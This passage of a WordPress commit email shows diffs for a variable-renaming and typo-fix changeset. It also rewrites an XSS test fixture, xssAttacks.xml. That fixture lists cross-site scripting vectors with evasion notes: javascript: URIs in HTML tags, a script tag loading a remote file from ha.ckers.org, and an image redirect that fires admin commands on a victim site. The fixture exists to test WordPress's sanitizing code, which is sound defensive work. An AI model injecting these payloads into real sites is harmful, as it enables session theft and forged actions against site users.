</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- foreach ( (array) $term_hierarchy as $anc => $descs ) {
- foreach ( (array) $descs as $desc ) {
- $term_to_ancestor[ $desc ] = $anc;
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ foreach ( (array) $term_hierarchy as $ancestor => $descendents ) {
+ foreach ( (array) $descendents as $desc ) {
+ $term_to_ancestor[ $desc ] = $ancestor;
</ins><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -365,9 +365,9 @@
</span><span class="cx" style="display: block; padding: 0 10px"> } elseif ( ! empty( $queried_object->taxonomy ) && is_taxonomy_hierarchical( $queried_object->taxonomy ) ) {
</span><span class="cx" style="display: block; padding: 0 10px"> $term_hierarchy = _get_term_hierarchy( $queried_object->taxonomy );
</span><span class="cx" style="display: block; padding: 0 10px"> $term_to_ancestor = array();
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- foreach ( (array) $term_hierarchy as $anc => $descs ) {
- foreach ( (array) $descs as $desc ) {
- $term_to_ancestor[ $desc ] = $anc;
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ foreach ( (array) $term_hierarchy as $ancestor => $descendents ) {
+ foreach ( (array) $descendents as $desc ) {
+ $term_to_ancestor[ $desc ] = $ancestor;
</ins><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px"> $desc = $queried_object->term_id;
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -430,13 +430,13 @@
</span><span class="cx" style="display: block; padding: 0 10px"> ) {
</span><span class="cx" style="display: block; padding: 0 10px"> $classes[] = 'current-menu-item';
</span><span class="cx" style="display: block; padding: 0 10px"> $menu_items[ $key ]->current = true;
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $_anc_id = (int) $menu_item->db_id;
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $ancestor_id = (int) $menu_item->db_id;
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> while (
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- ( $_anc_id = (int) get_post_meta( $_anc_id, '_menu_item_menu_item_parent', true ) )
- && ! in_array( $_anc_id, $active_ancestor_item_ids, true )
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ ( $ancestor_id = (int) get_post_meta( $ancestor_id, '_menu_item_menu_item_parent', true ) )
+ && ! in_array( $ancestor_id, $active_ancestor_item_ids, true )
</ins><span class="cx" style="display: block; padding: 0 10px"> ) {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $active_ancestor_item_ids[] = $_anc_id;
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $active_ancestor_item_ids[] = $ancestor_id;
</ins><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> if ( 'post_type' === $menu_item->type && 'page' === $menu_item->object ) {
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -457,13 +457,13 @@
</span><span class="cx" style="display: block; padding: 0 10px"> ) {
</span><span class="cx" style="display: block; padding: 0 10px"> $classes[] = 'current-menu-item';
</span><span class="cx" style="display: block; padding: 0 10px"> $menu_items[ $key ]->current = true;
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $_anc_id = (int) $menu_item->db_id;
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $ancestor_id = (int) $menu_item->db_id;
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> while (
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- ( $_anc_id = (int) get_post_meta( $_anc_id, '_menu_item_menu_item_parent', true ) )
- && ! in_array( $_anc_id, $active_ancestor_item_ids, true )
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ ( $ancestor_id = (int) get_post_meta( $ancestor_id, '_menu_item_menu_item_parent', true ) )
+ && ! in_array( $ancestor_id, $active_ancestor_item_ids, true )
</ins><span class="cx" style="display: block; padding: 0 10px"> ) {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $active_ancestor_item_ids[] = $_anc_id;
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $active_ancestor_item_ids[] = $ancestor_id;
</ins><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $active_parent_item_ids[] = (int) $menu_item->menu_item_parent;
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -494,13 +494,13 @@
</span><span class="cx" style="display: block; padding: 0 10px"> if ( $raw_item_url && in_array( $item_url, $matches, true ) ) {
</span><span class="cx" style="display: block; padding: 0 10px"> $classes[] = 'current-menu-item';
</span><span class="cx" style="display: block; padding: 0 10px"> $menu_items[ $key ]->current = true;
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $_anc_id = (int) $menu_item->db_id;
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $ancestor_id = (int) $menu_item->db_id;
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> while (
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- ( $_anc_id = (int) get_post_meta( $_anc_id, '_menu_item_menu_item_parent', true ) )
- && ! in_array( $_anc_id, $active_ancestor_item_ids, true )
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ ( $ancestor_id = (int) get_post_meta( $ancestor_id, '_menu_item_menu_item_parent', true ) )
+ && ! in_array( $ancestor_id, $active_ancestor_item_ids, true )
</ins><span class="cx" style="display: block; padding: 0 10px"> ) {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $active_ancestor_item_ids[] = $_anc_id;
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $active_ancestor_item_ids[] = $ancestor_id;
</ins><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> if ( in_array( home_url(), array( untrailingslashit( $current_url ), untrailingslashit( $_indexless_current ) ), true ) ) {
</span></span></pre></div>
<a id="trunksrcwpincludespostphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-includes/post.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-includes/post.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-includes/post.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -3403,7 +3403,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $post_mime_types = array_map( 'trim', explode( ',', $post_mime_types ) );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $wheres = array();
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $where_clauses = array();
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> foreach ( (array) $post_mime_types as $mime_type ) {
</span><span class="cx" style="display: block; padding: 0 10px"> $mime_type = preg_replace( '/\s/', '', $mime_type );
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -3431,14 +3431,14 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> if ( str_contains( $mime_pattern, '%' ) ) {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $wheres[] = empty( $table_alias ) ? "post_mime_type LIKE '$mime_pattern'" : "$table_alias.post_mime_type LIKE '$mime_pattern'";
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $where_clauses[] = empty( $table_alias ) ? "post_mime_type LIKE '$mime_pattern'" : "$table_alias.post_mime_type LIKE '$mime_pattern'";
</ins><span class="cx" style="display: block; padding: 0 10px"> } else {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $wheres[] = empty( $table_alias ) ? "post_mime_type = '$mime_pattern'" : "$table_alias.post_mime_type = '$mime_pattern'";
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $where_clauses[] = empty( $table_alias ) ? "post_mime_type = '$mime_pattern'" : "$table_alias.post_mime_type = '$mime_pattern'";
</ins><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- if ( ! empty( $wheres ) ) {
- $where = ' AND (' . implode( ' OR ', $wheres ) . ') ';
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ if ( ! empty( $where_clauses ) ) {
+ $where = ' AND (' . implode( ' OR ', $where_clauses ) . ') ';
</ins><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> return $where;
</span></span></pre></div>
<a id="trunksrcwpincludesthemephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-includes/theme.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-includes/theme.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-includes/theme.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -3562,7 +3562,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $changeset_uuid = false;
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /*
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Set initially fo false since defaults to true for back-compat;
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Set initially to false since defaults to true for back-compat;
</ins><span class="cx" style="display: block; padding: 0 10px"> * can be overridden via the customize_changeset_branching filter.
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> $branching = false;
</span></span></pre></div>
<a id="trunktestsphpunitdataformattingxssAttacksxml"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/data/formatting/xssAttacks.xml</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/data/formatting/xssAttacks.xml 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/data/formatting/xssAttacks.xml 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -1,433 +1,433 @@
</span><span class="cx" style="display: block; padding: 0 10px"> <?xml version="1.0"?>
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-<xss>
- <attack>
- <name>XSS Locator</name>
- <code>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}</code>
- <desc>Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. You'll need to replace the "&" with "%26" if you are submitting this XSS string via HTTP GET or it will be ignored and everything after it will be interpreted as another variable. Tip: If you're in a rush and need to quickly check a page, often times injecting the deprecated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably.</desc>
- <label>Basic XSS Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>XSS Quick Test</name>
- <code>'';!--"<XSS>=&{()}</code>
- <desc>If you don't have much space, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS versus &lt;XSS to see if it is vulnerable.</desc>
- <label>Basic XSS Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>SCRIPT w/Alert()</name>
- <code><SCRIPT>alert('XSS')</SCRIPT></code>
- <desc>Basic injection attack</desc>
- <label>Basic XSS Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>SCRIPT w/Source File</name>
- <code><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT></code>
- <desc>No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here).</desc>
- <label>Basic XSS Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>SCRIPT w/Char Code</name>
- <code><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></code>
- <desc>Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up.</desc>
- <label>Basic XSS Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>BASE</name>
- <code><BASE HREF="javascript:alert('XSS');//"></code>
- <desc>Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>BGSOUND</name>
- <code><BGSOUND SRC="javascript:alert('XSS');"></code>
- <desc>BGSOUND</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>BODY background-image</name>
- <code><BODY BACKGROUND="javascript:alert('XSS');"></code>
- <desc>BODY image</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>BODY ONLOAD</name>
- <code><BODY ONLOAD=alert('XSS')></code>
- <desc>BODY tag (I like this method because it doesn't require using any variants of "javascript:" or "<SCRIPT..." to accomplish the XSS attack)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>DIV background-image 1</name>
- <code><DIV STYLE="background-image: url(javascript:alert('XSS'))"></code>
- <desc>Div background-image</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>DIV background-image 2</name>
- <code><DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"></code>
- <desc>Div background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279)</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>DIV expression</name>
- <code><DIV STYLE="width: expression(alert('XSS'));"></code>
- <desc>Div expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression"</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>FRAME</name>
- <code><FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET></code>
- <desc>Frame (Frames have the same sorts of XSS problems as iframes).</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>IFRAME</name>
- <code><IFRAME SRC="javascript:alert('XSS');"></IFRAME></code>
- <desc>Iframe (If iframes are allowed there are a lot of other XSS problems as well).</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>INPUT Image</name>
- <code><INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"></code>
- <desc>INPUT Image</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>IMG w/JavaScript Directive</name>
- <code><IMG SRC="javascript:alert('XSS');"></code>
- <desc>Image XSS using the JavaScript directive.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>IMG No Quotes/Semicolon</name>
- <code><IMG SRC=javascript:alert('XSS')></code>
- <desc>No quotes and no semicolon</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>IMG Dynsrc</name>
- <code><IMG DYNSRC="javascript:alert('XSS');"></code>
- <desc>IMG Dynsrc</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>IMG Lowsrc</name>
- <code><IMG LOWSRC="javascript:alert('XSS');"></code>
- <desc>IMG Lowsrc</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>IMG Embedded commands 1</name>
- <code><IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"></code>
- <desc>This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors.</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>IMG Embedded commands 2</name>
- <code>Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser</code>
- <desc>IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC="http://badguy.com/a.jpg"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this).</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>IMG STYLE w/expression</name>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+<xss>
+ <attack>
+ <name>XSS Locator</name>
+ <code>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}</code>
+ <desc>Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. You'll need to replace the "&" with "%26" if you are submitting this XSS string via HTTP GET or it will be ignored and everything after it will be interpreted as another variable. Tip: If you're in a rush and need to quickly check a page, often times injecting the deprecated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably.</desc>
+ <label>Basic XSS Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>XSS Quick Test</name>
+ <code>'';!--"<XSS>=&{()}</code>
+ <desc>If you don't have much space, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS versus &lt;XSS to see if it is vulnerable.</desc>
+ <label>Basic XSS Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>SCRIPT w/Alert()</name>
+ <code><SCRIPT>alert('XSS')</SCRIPT></code>
+ <desc>Basic injection attack</desc>
+ <label>Basic XSS Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>SCRIPT w/Source File</name>
+ <code><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT></code>
+ <desc>No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here).</desc>
+ <label>Basic XSS Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>SCRIPT w/Char Code</name>
+ <code><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></code>
+ <desc>Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up.</desc>
+ <label>Basic XSS Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>BASE</name>
+ <code><BASE HREF="javascript:alert('XSS');//"></code>
+ <desc>Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>BGSOUND</name>
+ <code><BGSOUND SRC="javascript:alert('XSS');"></code>
+ <desc>BGSOUND</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>BODY background-image</name>
+ <code><BODY BACKGROUND="javascript:alert('XSS');"></code>
+ <desc>BODY image</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>BODY ONLOAD</name>
+ <code><BODY ONLOAD=alert('XSS')></code>
+ <desc>BODY tag (I like this method because it doesn't require using any variants of "javascript:" or "<SCRIPT..." to accomplish the XSS attack)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>DIV background-image 1</name>
+ <code><DIV STYLE="background-image: url(javascript:alert('XSS'))"></code>
+ <desc>Div background-image</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>DIV background-image 2</name>
+ <code><DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"></code>
+ <desc>Div background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279)</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>DIV expression</name>
+ <code><DIV STYLE="width: expression(alert('XSS'));"></code>
+ <desc>Div expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression"</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>FRAME</name>
+ <code><FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET></code>
+ <desc>Frame (Frames have the same sorts of XSS problems as iframes).</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>IFRAME</name>
+ <code><IFRAME SRC="javascript:alert('XSS');"></IFRAME></code>
+ <desc>Iframe (If iframes are allowed there are a lot of other XSS problems as well).</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>INPUT Image</name>
+ <code><INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"></code>
+ <desc>INPUT Image</desc>
+ <label>HTML Element Attacks</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>IMG w/JavaScript Directive</name>
+ <code><IMG SRC="javascript:alert('XSS');"></code>
